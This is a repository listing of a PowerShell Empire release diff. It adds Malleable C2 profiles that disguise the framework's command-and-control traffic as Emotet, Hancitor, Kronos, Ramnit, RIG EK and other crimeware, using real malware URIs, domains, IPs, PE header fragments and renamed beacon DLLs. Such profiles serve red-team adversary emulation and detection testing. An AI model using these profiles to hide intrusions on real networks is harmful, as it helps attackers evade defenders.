Codebase list powershell-empire / 617eb8f
New upstream version 3.7.2 Sophie Brun 3 years ago
26 changed file(s) with 4289 addition(s) and 21 deletion(s). Raw diff Collapse all Expand all
+2
-1
VERSION less more
0 3.7.1
0 3.7.2
1
+7
-0
changelog less more
0 2/5/2021
1 ------------
2 - Version 3.7.2 Master Release
3 - Fixed Malleable C2 issue where netbios/netbiosu transformations used excessive resources (@Cx01N)
4 - Fixed error when loading http_hop listener options (@Cx01N)
5
06 1/27/2021
7 ------------
18 - Version 3.7.1 Master Release
29 - Added Kali message to main menu
310
+80
-0
data/profiles/Crimeware/asprox.profile less more
0 #
1 # Asprox botnet traffic profile
2 # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
3 #
4 # Author: @harmj0y
5 #
6 set sample_name "Asprox Botnet";
7
8 set sleeptime "30000"; # use a ~30s delay between callbacks
9 set jitter "20"; # throw in a 10% jitter
10 set maxdns "255";
11 set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)";
12
13 http-get {
14
15 set uri "/";
16
17 client {
18
19 header "Accept" "*/*";
20 header "Content-Type" "application/x-www-form-urlencoded";
21 header "Content-Transfer-Encoding" "base64";
22 header "Connection" "Keep-Alive";
23
24 metadata {
25 netbiosu;
26 uri-append;
27 }
28 }
29
30 server {
31
32 header "Server" "nginx/1.2.5";
33 header "Content-Type" "text/html";
34 header "X-Powered-By" "PHP/5.4.4-7";
35 header "Vary" "Accept-Encoding";
36
37 output {
38 base64;
39 print;
40 }
41 }
42 }
43
44 http-post {
45
46 # random hash to try to simulate the post uri in the report
47 set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1";
48
49 client {
50
51 header "Accept" "*/*";
52 header "Content-Type" "application/x-www-form-urlencoded";
53 header "Content-Transfer-Encoding" "base64";
54 header "Connection" "Keep-Alive";
55
56 id {
57 parameter "id";
58 }
59
60 output {
61 base64;
62 print;
63 }
64 }
65
66 server {
67
68 header "Server" "nginx/1.2.5";
69 header "Content-Type" "text/html";
70 header "X-Powered-By" "PHP/5.4.4-7";
71 header "Vary" "Accept-Encoding";
72
73 output {
74 base64;
75 print;
76 }
77 }
78 }
79
+139
-0
data/profiles/Crimeware/emotet.profile less more
0 #emotet
1 #mostly taken from --> http://www.broadanalysis.com/2017/08/14/emotet-banking-trojan-2017-08-14-malspam/
2 #found this regarding the encoded 'cookie' string --> https://www.cisecurity.org/emotet-changes-ttp-and-arrives-in-united-states/
3 #xx0hcd
4
5
6 set sleeptime "30000";
7 set jitter "20";
8 set useragent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0)";
9 set dns_idle "8.8.8.8";
10 set maxdns "235";
11
12
13 http-get {
14
15 set uri "/LSnmkxT/";
16
17 client {
18
19 header "Host" "trevorcameron.com";
20 header "Connection" "Keep-Alive";
21
22
23 metadata {
24 netbios;
25 header "Cookie";
26
27
28 }
29
30
31 }
32
33 server {
34
35 header "Server" "Apache";
36 header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
37 header "Pragma" "no-cache";
38 header "Content-Disposition" "attachment; filename='NFccF.exe'";
39 header "Content-Transfer-Encoding" "binary";
40 header "Keep-Alive" "timeout=2, max=100";
41 header "Connection" "Keep-Alive";
42
43
44 output {
45 netbios;
46
47 prepend "11f10
48 MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
49
50 $.......h.+.,OE.,OE.,OE..... OE......OE.....1OE...F.:[email protected].%7..%OE.,OD.[OE...L.-OE.....-OE...G.-OE.Rich,OE.........PE..L......Y.............................].";
51
52 append "9(90989<9D9X9x9.9.9.9.9.: :@:`:.:.:.:.:.:.:.;(;H;h;.;.;.;.;.;.<(<H<h<.<.<.<.<.=(=H=h=.=.=.=.=.=.>(>D>H>P>X>`>t>|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.? ?4?<?P?..........p1t1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1(2X2h2x2.2.2.2.2.2.2.2.2p3t3.8.9.9.9.:0:P:h:.:.:.:.;0;;x;.;.;.;.;.<D<h<.<.<.<(=D=d=.=.=.=.>........................................................................................................................................................................................................................................................................................................
53 0";
54 print;
55 }
56 }
57 }
58
59 http-post {
60
61 set uri "/LSnmkXT/";
62
63 client {
64
65 header "Host" "77.244.37:7080";
66 header "Connection" "Keep-Alive";
67 header "Cache-Control" "no-cache";
68
69 output {
70 netbios;
71 print;
72
73 }
74
75 #not sure where to stick this to look good...
76 id {
77 base64url;
78 header "Cookie";
79
80 }
81 }
82
83 server {
84
85 header "Server" "nginx";
86 header "Content-Type" "text/html; charset=UTF-8";
87 header "Connection" "keep-alive";
88
89
90 output {
91 netbios;
92 print;
93 }
94 }
95 }
96
97 http-stager {
98
99 set uri_x86 "/ckgawd/";
100 set uri_x64 "/Ckgawd/";
101
102 client {
103 header "Host" "blushphotoandfilm.com";
104 header "Connection" "Keep-Alive";
105 }
106
107 server {
108 header "Cache-Control" "Cache-Control: no-cache, no-store, max-age=0, must-revalidate";
109 header "Content-Type" "application/octet-stream";
110 header "Server" "Apache";
111 header "Connection" "Keep-Alive";
112
113 }
114
115
116 }
117 #from link in doc --> https://www.virustotal.com/#/file/17ced37ec7b9a02b142f5ca527e1bba05c723231b3d4fc1a951e45ec002a17e5/details
118 stage {
119 set compile_time "11 Nov 2010 23:29:33";
120 set userwx "false";
121 set image_size_x86 "298000";
122
123 #some dll names seen by --> https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Emotet.N!bit
124 transform-x86 {
125 strrep "beacon.dll" "api32.dll";
126 }
127
128 transform-x64 {
129 strrep "beacon.x64.dll" "mgr32.dll";
130 }
131
132 #https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Emotet.yar
133 stringw "{ 4d 5a }";
134 stringw "{ 0f 45 fb 0f 45 de }";
135 stringw "{ C7 04 24 00 00 00 00 89 44 24 0? }";
136 stringw "{ 89 E? 8D ?? 24 ?? 89 ?? FF D0 83 EC 04 }";
137
138 }
+73
-0
data/profiles/Crimeware/fiesta.profile less more
0 #
1 # Fiesta Exploit Kit traffic profile
2 # http://malware-traffic-analysis.net/2014/04/05/index.html
3 #
4 # Author: @harmj0y
5 #
6
7 set sleeptime "30000"; # use a ~30s delay between callbacks
8 set jitter "10"; # throw in a 10% jitter
9 set maxdns "255";
10 set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11";
11
12 http-get {
13
14 set uri "/rmvk30g/";
15
16 client {
17 # mimic this Fiesta instance's header information
18 header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2";
19 header "Connection" "keep-alive";
20
21 # encode session metadata as close as we can to a Fiesta URI request
22 metadata {
23 netbios;
24 append ";1;4;1";
25 uri-append;
26 }
27 }
28
29 server {
30 header "Server" "Apache/2.2.15 (CentOS)";
31 header "X-Powered-By" "PHP/5.3.27";
32 header "Content-Type" "application/octet-stream";
33 header "Connection" "close";
34
35 output {
36 print;
37 }
38 }
39 }
40
41 http-post {
42
43 set uri "/";
44
45 client {
46
47 # fake out a different user agent for the post back
48 header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)";
49
50 id {
51 netbios;
52 uri-append;
53 }
54
55 output {
56 base64;
57 print;
58 }
59 }
60
61 server {
62 header "Server" "nginx/1.4.2";
63 header "Content-Type" "text/html";
64 header "Connection" "close";
65
66 output {
67 base64;
68 print;
69 }
70 }
71 }
72
+71
-0
data/profiles/Crimeware/fiesta2.profile less more
0 #
1 # A second Fiesta Exploit Kit traffic profile
2 # http://malware-traffic-analysis.net/2014/04/05/index.html
3 #
4 # Author: @harmj0y
5 #
6 set sample_name "Fiesta Exploit Kit";
7
8 set sleeptime "30000"; # use a ~30s delay between callbacks
9 set jitter "10"; # throw in a 10% jitter
10 set maxdns "255";
11
12 http-get {
13
14 set uri "/v20idaf/";
15
16 client {
17 # mimic this Fiesta instance's header information
18 header "Accept" "*/*";
19 header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)";
20
21 # encode session metadata as close as we can to a Fiesta URI request
22 metadata {
23 netbios;
24 append ";112202;228";
25 uri-append;
26 }
27 }
28
29 server {
30 header "Server" "nginx/1.4.4";
31 header "Content-Type" "application/octet-stream";
32 header "Connection" "close";
33
34 output {
35 print;
36 }
37 }
38 }
39
40 http-post {
41
42 set uri "/";
43
44 client {
45
46 header "Accept" "*/*";
47 header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)";
48
49 id {
50 netbios;
51 uri-append;
52 }
53
54 output {
55 base64;
56 print;
57 }
58 }
59
60 server {
61 header "Server" "nginx/1.4.4";
62 header "Content-Type" "application/octet-stream";
63 header "Connection" "close";
64
65 output {
66 print;
67 }
68 }
69 }
70
+140
-0
data/profiles/Crimeware/globeimposter.profile less more
0 #GlobeImposter ransomware
1 #taken from --> http://www.malware-traffic-analysis.net/2017/11/30/index.html
2 #xx0hcd
3
4 set sleeptime "30000";
5 set jitter "20";
6 set useragent "Mozilla Firefox/4.0(compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0;SLC2; .NET CLD 3.5.30729; Media Center PC 6.0;)";
7 set dns_idle "8.8.8.8";
8 set maxdns "235";
9
10
11 http-get {
12
13 set uri "/JHGcd476334";
14
15 client {
16
17 header "Accept" "*/*";
18 header "Accept-Encoding" "gzip, deflate";
19 header "Host" "awholeblueworld.com";
20 header "Connection" "Keep-Alive";
21
22
23 metadata {
24 base64url;
25 header "Cookie";
26
27 }
28
29
30 }
31
32 server {
33
34 header "Server" "nginx";
35 header "Content-Type" "text/plain";
36 header "Connection" "keep-alive";
37 header "Vary" "Accept-Encoding";
38 header "X-Powered-By" "PleskLin";
39 header "Content-Encoding" "gzip";
40
41
42 output {
43
44 netbios;
45 prepend "500a ...............|T..?~.G..a.I H. AQ...J...";
46 print;
47 }
48 }
49 }
50
51 http-post {
52 set verb "GET";
53 set uri "/count.php";
54
55 client {
56
57 header "Accept" "*/*";
58 header "Accept-Encoding" "gzip, deflate";
59 header "Host" "awholeblueworld.com";
60 header "Connection" "Keep-Alive";
61
62 output {
63 base64url;
64 parameter "nu";
65
66
67
68 }
69
70
71 id {
72 base64url;
73 parameter "fb";
74
75 }
76
77 # parameter "fb" "110";
78
79 }
80
81 server {
82
83 header "Server" "nginx";
84 header "Content-Type" "text/plain";
85 header "Connection" "keep-alive";
86 header "Vary" "Accept-Encoding";
87 header "X-Powered-By" "PleskLin";
88 header "Content-Encoding" "gzip";
89
90
91 output {
92 netbios;
93 prepend "500a ...............|T..?~.G..a.I H. AQ...J...";
94 print;
95 }
96
97 }
98 }
99
100 http-stager {
101
102 set uri_x86 "/JHGCd476334";
103 set uri_x64 "/JHGcD476334";
104
105
106 client {
107
108 header "Host" "awholeblueworld";
109 header "Connection" "keep-alive";
110
111 }
112
113 server {
114
115 header "Server" "nginx";
116 header "Content-Type" "text/plain";
117 header "Connection" "keep-alive";
118 header "Vary" "Accept-Encoding";
119 header "X-Powered-By" "PleskLin";
120 header "Content-Encoding" "gzip";
121
122
123 output {
124
125 print;
126 }
127
128 }
129
130
131 }
132
133 stage {
134 set userwx "true";
135 set compile_time "03 Feb 2016 09:17:32";
136 set image_size_x86 "448012";
137 set image_size_x64 "448012";
138 #set obfuscate "true";
139 }
+142
-0
data/profiles/Crimeware/hancitor.profile less more
0 #hancitor
1 #taken from --> http://www.malware-traffic-analysis.net/2017/12/20/index.html
2 #xx0hcd
3
4
5 set sleeptime "30000";
6 set jitter "20";
7 set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko)";
8 set dns_idle "8.8.8.8";
9 set maxdns "235";
10
11
12 http-get {
13
14 set uri "/mlu/forum.php";
15
16 client {
17
18 header "Host" "arrepsinrab.com";
19 header "Accept" "*/*";
20 header "Accept-Encoding" "identity, *;q=0";
21 header "Accept-Language" "en-US";
22 header "Content-Type" "application/octet-stream";
23 header "Connection" "close";
24 header "Content-Encoding" "binary";
25
26
27 metadata {
28 netbios;
29 header "Cookie";
30
31
32 }
33
34
35 }
36
37 server {
38
39 header "Server" "nginx/1.10.2";
40 header "Content-Type" "text/html";
41 header "Keep-Alive" "timeout=2, max=100";
42 header "Connection" "close";
43 header "X-Powered-By" "PHP/5.4.45";
44
45
46 output {
47 netbios;
48 print;
49 }
50 }
51 }
52
53 http-post {
54
55 set uri "/ls5/forum.php";
56
57 client {
58
59 header "Accept" "*/*";
60 header "Content-Type" "application/x-www-form-urlencoded";
61 header "Host" "gedidnundno.com";
62 header "Cache-Control" "no-cache";
63
64 output {
65 netbios;
66 print;
67
68 }
69
70
71 id {
72 netbiosu;
73 header "GUID";
74
75 }
76 }
77
78 server {
79
80 header "Server" "nginx/1.10.2";
81 header "Content-Type" "text/html";
82 header "Transfer-Encoding" "chunked";
83 header "Connection" "keep-alive";
84 header "X-Powered-By" "PHP/5.4.45";
85
86
87 output {
88 netbios;
89 print;
90 }
91 }
92 }
93
94 http-stager {
95
96 set uri_x86 "/lS5/forum.php";
97 set uri_x64 "/ls5/Forum.php";
98
99 client {
100 header "Accept" "text/html, application/xhtml+xml, */*";
101 header "Accept-Language" "en-US";
102 header "Host" "acamonitoringltd.ca";
103 header "Connection" "Keep-Alive";
104 }
105
106 server {
107 header "Server" "nginx";
108 header "Content-Type" "application/msword;";
109 header "Keep-Alive" "timeout=2, max=100";
110 header "Connection" "Keep-Alive";
111 header "X-Powered-By" "PHP/5.3.3";
112 header "Content-Disposition" "attachment; filename=fax_286509.doc";
113 header "Pragma" "private";
114
115 }
116
117
118 }
119
120 stage {
121 #random
122 set compile_time "15 Nov 2017 12:24:14";
123 set userwx "false";
124 set image_size_x86 "301000";
125
126 #https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html
127 transform-x86 {
128 strrep "beacon.dll" "pm.dll";
129 }
130
131 transform-x64 {
132 strrep "beacon.x64.dll" "PM.dll";
133 }
134
135 #https://github.com/Yara-Rules/rules/blob/d1da9c002d1d00045f53ea1502cfcc7dd43c115e/Malicious_Documents/Maldoc_hancitor_dropper
136 stringw "{ 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 }";
137 stringw "{ 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 }";
138 stringw "{ 00 43 61 6C 6C 57 69 6E 64 6F 77 50 72 6F 63 41 00 }";
139 stringw "{ 50 4F 4C 41 }";
140
141 }
+129
-0
data/profiles/Crimeware/kronos.profile less more
0 #kronos
1 #https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/
2 #https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/
3 #https://www.hybrid-analysis.com/sample/8389dd850c991127f3b3402dce4201cb693ec0fb7b1e7663fcfa24ef30039851?environmentId=100
4 #xx0hcd
5
6
7 set sleeptime "30000";
8 set jitter "20";
9 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36";
10 set dns_idle "8.8.8.8";
11 set maxdns "235";
12
13
14 http-get {
15
16 set uri "/lampi/upload/38bacf4f.exe";
17
18 client {
19
20 header "Host" "hjbkjbhkjhbkjhl.info";
21
22
23 metadata {
24 base64url;
25 prepend "PHPSESSID=";
26 header "Cookie";
27
28 }
29
30 }
31
32 server {
33
34 header "Server" "nginx/1.10.2";
35 header "Content-Type" "application/octet-stream";
36 header "Connection" "close";
37 header "ETag" "2ca0669-6d600-557bba73d8218";
38 header "Accept-Ranges" "bytes";
39
40 output {
41
42 netbios;
43 prepend "MZ....................@..........................!......L..!This Program cannot be run in DOS mode.$...................~........:.....:.....:.....7.{.-...7.D.H..7.E...";
44
45 print;
46 }
47 }
48 }
49
50 http-post {
51
52 set uri "/lampi/connect.php";
53
54 client {
55
56 header "Host" "hjbkjbhkjhbkjhl.info";
57 header "Cache-Control" "no-cache";
58
59 output {
60 base64url;
61 prepend "PHPSESSID=";
62
63 header "Cookie";
64
65
66 }
67
68
69 id {
70 base64url;
71 parameter "a";
72
73 }
74 }
75
76 server {
77
78 header "Server" "nginx/1.10.2";
79 header "Content-Type" "text/html; charset=windows-1251";
80 header "X-Powered-By" "PHP/5.3.3";
81 header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0";
82 header "Pragma" "non-cache";
83
84
85 output {
86 netbios;
87
88 print;
89 }
90 }
91 }
92
93 http-stager {
94
95 set uri_x86 "/lampi/Connect.php";
96 set uri_x64 "/Lampi/connect.php";
97
98 client {
99 header "Host" "hjbkjbhkjhbkjhl.info";
100 header "Cache-Control" "no-cache";
101 }
102
103 server {
104 header "Server" "nginx/1.10.2";
105 header "Content-Type" "text/html; charset=windows-1251";
106 header "X-Powered-By" "PHP/5.3.3";
107 header "Cache-Control" "no-store, non-cache, must-revalidate, post-check=0, pre-check=0";
108 header "Pragma" "non-cache";
109
110 }
111
112
113 }
114
115
116
117 #from peclone
118 stage {
119 set checksum "0";
120 set compile_time "23 Aug 2017 10:19:26";
121 set entry_point "37713";
122 set image_size_x86 "495616";
123 set image_size_x64 "495616";
124 set rich_header "\x07\x4f\x6b\x48\x43\x2e\x05\x1b\x43\x2e\x05\x1b\x43\x2e\x05\x1b\xf7\xb2\xf4\x1b\x49\x2e\x05\x1b\xf7\xb2\xf6\x1b\xc2\x2e\x05\x1b\xf7\xb2\xf7\x1b\x5a\x2e\x05\x1b\x78\x70\x06\x1a\x51\x2e\x05\x1b\x78\x70\x01\x1a\x51\x2e\x05\x1b\x78\x70\x00\x1a\x66\x2e\x05\x1b\x4a\x56\x96\x1b\x44\x2e\x05\x1b\x43\x2e\x04\x1b\x21\x2e\x05\x1b\xd4\x70\x0c\x1a\x42\x2e\x05\x1b\xd1\x70\xfa\x1b\x42\x2e\x05\x1b\xd4\x70\x07\x1a\x42\x2e\x05\x1b\x52\x69\x63\x68\x43\x2e\x05\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
125 }
126
127
128
+157
-0
data/profiles/Crimeware/ramnit.profile less more
0 #ramnit trojan
1 #combines traffic seen from seamless campaign
2 #taken from --> https://malwarebreakdown.com/2018/01/16/rig-exploit-kit-delivers-ramnit-banking-trojan-via-seamless-malvertising-campaign/
3 #xx0hcd
4
5
6 set sleeptime "30000";
7 set jitter "20";
8 set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko)";
9 set dns_idle "8.8.8.8";
10 set maxdns "235";
11
12
13 http-get {
14
15 set uri "/redirect";
16
17 client {
18
19 header "Accept" "text/html, application/xhtml+xml, */*";
20 header "Accept-Language" "en-US";
21 header "Accept-Encoding" "gzip, deflate";
22 header "Host" "redirect.turself-josented.com";
23 header "Connection" "Keep-Alive";
24
25
26
27 metadata {
28 netbios;
29 parameter "target";
30
31
32 }
33
34
35 }
36
37 server {
38
39 header "Server" "nginx";
40 header "Content-Type" "text/html;charset=UTF-8";
41 header "Connection" "keep-alive";
42 header "Cache-Control" "no-store, no-cache, pre-check=0, post-check=0";
43 header "Expires" "Thu, 01 Jan 1970 00:00:00 GMT";
44 header "Pragma" "no-cache";
45
46
47 output {
48 base64;
49 prepend "105";
50 prepend "<html><head><link rel=\"icon\" type=\"image/gif\" href=\"data:image/gif;base64,";
51
52 append "\"/><meta http-equiv=\"refresh\" content=\"0;URL='http://xn-b1aanbboc3ad8jee4bff.xn--p1ai/gav4.php'\" /></head><body></body></html>";
53
54 print;
55 }
56 }
57 }
58
59 http-post {
60
61 set uri "/Redirect.php";
62
63 client {
64
65 header "Accept" "*/*";
66 # header "Content-Type" "application/x-www-form-urlencoded";
67 # header "X-Requested-With" "XMLHttpRequest";
68 header "Referer" "http://........../redirect.php?acsc=93042904";
69 header "Accept-Language" "en-US";
70 header "Host" "xn--b1aanbboc3ad8jee4bff.xn--p1ai";
71 # header "Connection" "Keep-Alive";
72
73 output {
74 netbios;
75 print;
76
77 }
78
79
80 id {
81 netbios;
82 prepend "http://........../redirect.php?acsc=";
83 header "Referer";
84
85 }
86 }
87
88 server {
89
90 header "Server" "nginx";
91 header "Content-Type" "text/html, charset=UTF-8";
92 header "Connection" "keep-alive";
93 header "Vary" "Accept-Encoding";
94 header "X-Powered-By" "PHP/5.6.30";
95 header "Cache-Control" "no-store, no-cache, must-revalidate, max-age=0";
96 header "Content-Encoding" "gzip";
97
98
99 output {
100 netbios;
101 print;
102 }
103 }
104 }
105
106 http-stager {
107
108 set uri_x86 "/Jump/next.php";
109 set uri_x64 "/jump/Next.php";
110
111 client {
112 header "Accept" "text/html, application/xhtml+xml, */*";
113 header "Referer" "http://buzzadnetwork.com/jump/next.php?r=1566861&sub1=";
114 header "Accept-Language" "en-US";
115 header "Accept-Encoding" "gzip, deflate";
116 header "Host" "www.buzzadnetwork.com";
117 header "Connection" "Keep-Alive";
118 }
119
120 server {
121 header "Server" "openresty";
122 header "Content-Type" "text/html; charset=utf-8";
123 header "Keep-Alive" "timeout=2, max=100";
124 header "Connection" "Keep-Alive";
125 header "Location" "http://xn--b1aanbboc3ad8jee4bff.xn--p1ai/redirect.php?acsc=93042904";
126 #has 2 r's in 'referrer'
127 header "Referrer-Policy" "no-referrer";
128 header "Vary" "Accept-Encoding";
129
130 }
131
132
133 }
134
135 stage {
136 #https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf
137 set compile_time "09 Jan 2014 12:24:14";
138 set userwx "false";
139 set image_size_x86 "316224";
140 set image_size_x64 "616224";
141
142 transform-x86 {
143 strrep "beacon.dll" "rmnsft.dll";
144 }
145
146 transform-x64 {
147 strrep "beacon.x64.dll" "RMNSFT.dll";
148 }
149
150 #https://github.com/tbarabosch/quincy-complementary-material/blob/master/yara/ramnit.yara
151 stringw "USERPASSCWD CDUPQUITPORTPASVTYPEMODERETRSTORAPPERESTRNFRRNTOABORDELERMD";
152 stringw "ModuleCode";
153 stringw "StartRoutine";
154 stringw "cookies.txt";
155
156 }
+144
-0
data/profiles/Crimeware/rigEK.profile less more
0 #rigEK
1 #taken from --> http://www.malware-traffic-analysis.net/2018/01/30/index.html
2 #xx0hcd
3
4
5 set sleeptime "30000";
6 set jitter "20";
7 set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko)";
8 set dns_idle "8.8.8.8";
9 set maxdns "235";
10
11
12 http-get {
13
14 set uri "/";
15
16 client {
17
18 header "Accept" "text/html, */*";
19 header "Accept-Language" "en-US";
20 header "Host" "176.57.208.59";
21 header "Connection" "Keep-Alive";
22
23
24
25 metadata {
26 netbios;
27 append "FeJzPWAlzAFfZGVub21pbmF0aW9ucwSTKqgxlbbnLbhBk";
28 parameter "Mzk2MTw";
29
30
31 }
32
33 parameter "GUaq" "OynNUEcKZTPj";
34
35 }
36
37 server {
38
39 header "Server" "nginx/1.6.2";
40 header "Content-Type" "text/html;charset=UTF-8";
41 header "Connection" "keep-alive";
42 header "Vary" "Accept-Encoding";
43 header "Content-Encoding" "gzip";
44
45
46 output {
47 netbios;
48
49 prepend "............[....0.<.Wx.a...=-...q..*.%(.. ..~.TFW..U z....))%...of.|.....$.52.....w...~....o..._.....w8.........z......m.[..e....j.9<n.._+..5.uVi.-........qC...V.]n..._..'.w..e............y..o......j..-bdpejjbmbjlndoaaelihhjajeldfojpgnfeeiifgjfdngfhiaamjogcjfkiahfljijinfjbldnplecpebkgbgaijmpcjkpfnbfngbdnccpbnhlbiikgmhjmdakkbd..w.............fu...WY......o8.=..YG..%....:1..... :(.~.......u..n9m..m.......V:m...3......j2....vM....zVv.u.";
50
51 append "..EQk.....q.....1.t..pNjq...u...m.h..........z+....Z*X.r...
52 ..*..N.z..8.1.m .y.F.1....U.. .........
53 ....Z'=..+..H...aI ..)..36J~..O.n.....J.....!=G...o._.....s!......-p.....+>........,.r......./......7|>.......2.5ad../.....-lj......N..T...x...9N..
54 .....N.a=..G..N...
55 .V.L.\"..U.d.Y.....s.....H.|. .4e...(b.CLV....Z..x..^v...%bdpejjbmbjlndoaaelihhjajeldfojpgnfeeiifgjfdngfhiaamjogcjfkiahfljijinfjbldnplecpebkgbgaijmpcjkpfnbfngbdnccpbnhlbiikgmhjmdakkbd...K.).d.......j.~(.y.u+.._c*....S$p.R.).../[email protected]......";
56
57 print;
58
59
60 }
61 }
62 }
63
64 http-post {
65
66 set uri "/gate.php";
67
68 client {
69
70 header "Host" "doueven.click";
71 header "Connection" "close";
72 header "Accept-Language" "en-US";
73 header "Content-Type" "image/jpeg";
74
75 output {
76 netbios;
77 print;
78
79 }
80
81
82 id {
83 netbios;
84 header "Cookie";
85
86 }
87 }
88
89 server {
90
91 header "Server" "Apache";
92 header "Upgrade" "h2,h2c";
93 header "Connection" "Upgrade, close";
94 header "Content-Type" "application/octet-stream";
95
96
97 output {
98 netbios;
99 prepend "IX.";
100 prepend " ";
101 prepend " ";
102
103 print;
104 }
105 }
106 }
107
108 http-stager {
109
110 set uri_x86 "/prink.exe";
111 set uri_x64 "/Prink.exe";
112
113 client {
114 header "Host" "31.31.203.14";
115 header "Accept-Language" "en-us";
116 header "Accept" "text/html, application/xml, image/png, image/jpeg, image/gif, image/x-xbitmap";
117 header "Accept-Charset" "utf-8, utf-16, iso-8859-1";
118 header "Pragma" "non-cache";
119 header "Connection" "close";
120 }
121
122 server {
123 header "Server" "nginx/1.10.2";
124 header "Content-Type" "application/octet-stream";
125 header "Keep-Alive" "timeout=2, max=100";
126 header "Connection" "close";
127 header "ETag" "be339-de000-563c784ba5900";
128 header "Accept-Ranges" "bytes";
129
130 }
131
132
133 }
134
135 stage {
136
137 set compile_time "28 Jan 2018 08:12:18";
138 set userwx "false";
139 set image_size_x86 "428544";
140 set image_size_x64 "428544";
141
142
143 }
+213
-0
data/profiles/Crimeware/saefko.profile less more
0 #saefko.profile
1 #https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat
2 #xx0hcd
3
4 ###global options###
5 set sleeptime "5000";
6 set jitter "33";
7 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38";
8
9 set sample_name "saefko.profile";
10
11 http-get {
12
13 set uri "/love/server.php";
14
15 set verb "GET";
16
17 client {
18
19 header "Host" "acpananma.com";
20
21
22 metadata {
23 base64url;
24 parameter "pass";
25 }
26
27 parameter "command" "UpdateHTTPIRCStatus";
28 parameter "machine_id" "202";
29 parameter "irc_status" "1";
30
31 }
32
33 server {
34 header "Server" "Apache";
35 header "X-Powered-By" "PHP/5.6.36";
36 header "Vary" "Accept-Encoding";
37 header "Content-Type" "text/html; charset=UTF-8";
38
39 output {
40
41 netbios;
42
43 prepend "ok\n";
44 prepend "2\n";
45
46 append "0\n";
47
48 print;
49 }
50 }
51 }
52
53 http-post {
54
55 set uri "/Love/server.php";
56 #set verb "GET";
57 set verb "POST";
58
59 client {
60
61 header "Content-Type" "application/x-www-form-urlencoded";
62 header "Host" "acpananma.com";
63 header "Expect" "100-continue";
64 header "Connection" "Keep-Alive";
65
66
67 output {
68 base64url;
69 parameter "command";
70
71 }
72
73 id {
74 base64url;
75 parameter "pass";
76
77 }
78
79 }
80
81 server {
82 header "Host" "acpananma.com";
83
84 output {
85 netbios;
86
87 prepend "\nHTTP/1.1 100 Continue\n\n";
88
89 #checked to make sure the misspells were misspelled, uh, correctly?
90 append "irc_channel\":\"null\",\"irc_nickname\":\"jI87fg\",\"irc_password\":\"K8gtr$4\",\"irc_port\":\"6669\",\"irc_server\":\"Setting+up+IRC+service.\",\"machine_active_time\":\"12\",\"machine_artct\":\"x86\",\"machine_bitcoin_value\":\"0\",\"machine_business_value\":\"0\",\"machine_calls_activity\":\"0\",\"machine_camera_activity\":\"8\",\"machine_country_iso_code\":\"8864\",\"machine_creadit_card_posiblty\":\"0\",\"machine_current_time\":\"10:32:45\",\"machine_facebook_activity\":\"0\",\"machine_gaming_value\":\"0\",\"machine_gmail_avtivity\":\"0\",\"machine_googlepluse_activity\":\"0\",\"machine_instgram_activity\":\"0\",\"machine_ip\":\"10.1.23.146\",\"machine_lat\":\"0\",\"machine_lng\":\"eng\",\"machine_os_type\":\"win\",\"machine_register_date\":\"0222\",\"machine_screenshot\":\"1";
91 print;
92 }
93 }
94 }
95
96 http-stager {
97
98 set uri_x86 "/clients2.google.com/generate_204";
99 set uri_x64 "/clients3.google.com/generate_204";
100
101 client {
102
103 header "Host" "acpananma.com";
104
105 }
106
107 server {
108 header "Server" "Apache";
109 header "X-Powered-By" "PHP/5.6.36";
110 header "Vary" "Accept-Encoding";
111 header "Content-Type" "text/html; charset=UTF-8";
112
113 output{
114 prepend "ok\n";
115 prepend "2\n";
116
117 append "0\n";
118 print;
119 }
120
121 }
122
123
124 }
125
126
127
128
129 ###Malleable PE Options###
130
131 post-ex {
132
133 set spawnto_x86 "%windir%\\syswow64\\wscript.exe";
